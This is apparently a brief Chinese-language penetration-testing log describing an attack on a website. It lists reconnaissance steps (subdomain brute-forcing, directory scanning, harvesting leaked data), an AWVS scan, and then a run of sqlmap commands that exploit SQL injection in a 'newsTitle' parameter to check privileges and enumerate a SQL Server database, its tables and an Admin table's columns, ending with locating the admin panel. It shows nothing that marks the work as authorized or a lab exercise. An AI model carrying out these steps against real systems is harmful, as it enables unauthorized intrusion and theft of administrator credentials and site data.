渗透记录
1.
信息收集:
子域名爆破,通过Layer爆破子域名
御剑扫描目录信息:
扫描到敏感路径,发现有信息泄露:
写脚本扫描泄露的信息,收集泄露的子域名信息,
2.扫描漏洞
在wvs中,添加收集到的目标,并对其新建扫描
扫描结果:
查看扫描详细信息,并且记录下http请求包,放到文件1.txt中,启动sqlmap,
扫描记录下的文件,扫描其中的http请求
sqlmap -r /opt/1.txt
扫描可能有漏洞的指定参数sqlmap -r /opt/1.txt -p newsTitle
发现为sqlserver,看是否有sa权限
sqlmap -r /opt/1.txt -p newsTitle --current-user
跑数据库
sqlmap -r /opt/1.txt -p newsTitle --current-db
跑表
sqlmap -r /opt/1.txt -p newsTitle -D 'xxxx' --tables
表详细信息,列名
sqlmap -r /opt/1.txt -p newsTitle -D 'xxxx' -T Admin --columns
得到结果后,扫描后台路径,验证数据